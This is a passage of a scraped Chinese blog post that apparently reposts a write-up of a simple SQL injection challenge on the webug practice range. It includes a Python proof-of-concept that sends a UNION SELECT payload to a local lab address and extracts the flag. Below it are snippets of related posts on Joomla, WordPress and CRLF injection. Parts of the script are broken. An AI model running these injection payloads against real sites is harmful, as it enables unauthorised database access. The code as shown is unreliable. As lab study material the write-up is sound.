用python寫註入漏洞的poc

阿新 • • 發佈：2018-04-30

html () fin 數據 import for 正則 ase poc

webug靶場一道簡單的註入題

技術分享圖片

加點後報錯

could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1‘‘‘ at line 1

大致可以猜出是雙引號的問題，閉合即可，接下來就是常規的註入過程，最後拿到flag

技術分享圖片

下面是代碼

#-*- coding:utf-8 -*-

import requests
import re

def 
 poc():
    url="http://192.168.241.128/pentest/test/sqli/sqltamp.php"
    data={
        "gid":"-1‘ union select 1,flag,3,4 from flag #"
    }
    req=requests.get(url,data)
    red=requests.p
    html=req.content
    html=html.decode(‘utf-8‘)
    sear=r‘名稱為:(.+?)</font>‘
    flag=re.findall(sear,html)


    with open( 
‘test1.txt‘,‘w‘) as f:
        f.write(str(flag))


if __name__ == ‘__main__‘:
    poc()

這裏我用正則匹配將flag匹配並寫入文件，一定要對返回的數據進行轉碼

否則匹配不到，還有%23要寫成#才能被python識別。

用python寫註入漏洞的poc

html () fin 數據 import for 正則 ase poc webug靶場一道簡單的註入題加點後報錯 could not to the database You have an error in your SQL syntax; check the man

一起寫框架-Ioc內核容器的實現-對象的調用-@Bean註解註入容器的對象（十二）

擴展 lac iter component cts block 根據 spa urn 實現功能現實需求中，有一些類似無法加入掃描組件註解的。如jdk裏面的類。那麽框架必須要支持將沒有組件註解標識的類也可以有一個方式註入到容器裏面。那麽，我們通過類似Spring的@

Joomla!3.7.0 Core SQL註入漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點：Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

joomla core註入漏洞

field bug con 語句 joomla from 訪問 limit mail 註入語句如下： payload1 = ‘/index.php?option=com_fields&view=fields&layout=modal&list[ful

[CVE-2017-5487] WordPress <=4.7.1 REST API 內容註入漏洞分析與復現

tps 文章分析請求利用 api文檔 each includes 什麽不是很新的漏洞，記錄下自己的工作任務漏洞影響：未授權獲取發布過文章的其他用戶的用戶名、id 觸發前提：wordpress配置REST API 影響版本：<= 4.7 0x01漏洞

用Python寫一個批量生成賬號的函數（用戶控制數據長度、數據條數）

shuf open 小寫長度數據 ase 函數用戶控制 app # 1、寫一個函數，批量生成一些註冊使用的賬號：[email protected]/* */，長度由用戶輸入，產生多少條也由用戶輸入，用戶名不能重復，用戶名必須由大寫字母、小寫字母、數字組成

用python寫CSV、EXCEL文件

() import exce 讀取 key print tput save style import pandas as pd writer = pd.ExcelWriter(‘output.xlsx‘) df1 = pd.DataFrame(data={‘col1‘:[

用Python寫一個小遊戲

python 小腳本剛學Python時間不長，但也知道了一點，看別人的參考寫了一個猜數字小遊戲，也算是禹學於樂吧。#!/usr/bin/env python #coding=utf-8

【疑問】用python寫登錄驗證遇到的問題

password () http eas ini contact blog pre python 最近開始斷斷續續學習python，今天加入博客園，作為新人，和各位老師們討教了，以後多多照顧！為了大家能看清楚所以就截圖了，文末尾附源碼，說不定會有那位老師給我指教一番。###

【安全牛學習筆記】初識sql註入漏洞原理

信息安全 sql security+ 網站沒有對輸入的字符進行過濾，導致輸入的字符影響到網站數據的查詢。編程數學邏輯思維 and or xor 且或否或：有一個真就是真且：有一個假就為假否：相反怎麽找是否有註入漏洞？第一個找符合參數鏈接的網站

CRLF註入漏洞

crlf 滲透測試回車換行 CRLF是“回車 + 換行”（\r\n）的簡稱。在HTTP協議中，HTTP Header與HTTP Body是用兩個CRLF分隔的，瀏覽器就是根據這兩個CRLF（使用payload %0a%0d%0a%0d進行測試）來取出HTTP內容並顯示出來。所以，一旦我們能夠控制

三、ADO.Net基礎【05】SQL註入漏洞（SQLInjection）

字符串大於拼接匹配常用 ado 執行註入漏洞基礎使用字符串拼接的方式把sql語句所需參數拼接到將要執行的sql語句中（參數一般只sql語句的過濾條件），對於用戶的惡意輸入可能導致不一的查詢結果例如：一個登錄的例子（UserName和Password是用戶的輸

SQL註入漏洞的分析與利用（一）

ces mysql 得出必須排序快速搭建 oracle 學習筆記 min SQL註入的核心思想黑客在正常的需要調用數據庫的URL後面構造一段數據庫查詢代碼，然後根據返回的結果，從而獲得想要的某些數據。SQL結構化查詢語言，絕大多數關系型數據庫（MySQL、Acces

SQL註入漏洞的分析與利用（二）

manage 如果得到 nio 學習筆記 sql註入 .com 密碼 vpd Access手工註入 1.實驗環境：實驗平臺：小旋風ASPWeb服務器目標網站：南方數據2.02.打開網站，隨意點開一個頁面看到？id=4說明有參數傳遞，用的是get方法，可能是一個註入點加入判

SQL註入漏洞的分析與利用（三）

和數 form 打開用戶 data 用戶名 text 必須存儲 MySQL數據庫：元數據庫information_schema1.在5.0以後版本的MySQL中存在著一個元數據庫information_schema，其中存儲著用戶在MySQL中創建的所有其他數據庫的信

用python寫一個簡單的excel表格獲取當時的linux系統信息

psutil 生成之前建立 set ces ext 流量關閉最近在學習excel表格的制作，順便結合之前學習的內容，利用python的兩個模板，分別是獲取系統信息的psutil，和生成excel表格的xlsxwriter。利用這兩個模板將生成一個簡單的excel表格

Python--sql註入

pymysql set red () log .exe password -s 執行 import pymysqlconn = pymysql.connect(host=‘211.149.218.16‘, user=‘jxz‘, password=‘123456‘, db=

用python寫一個九九乘法表-2月19日/2018

九九乘法 while -c pos ont 九九 pytho 九九乘法表 font first = 1 while first<=9: 　　sec=1 　　while sec<=first: 　　　　print(str(sec),"x",str(first),

用python寫一個restful API

python restful # -*- coding: utf-8 -*- # 作者：煮酒品茶 """ package.module ~~~~~~~~~~~~~~ python實現的圖書的一個restful api. 參考restful設計指南 URL：

用python寫一個微信聊天機器人

python wechat 聊天機器人 # -*- coding: utf-8 -*- """ package.module ~~~~~~~~~~~~~~ 一個微信機器人程序微信客戶端itchat: http://itchat.readthed

用python寫註入漏洞的poc

相關推薦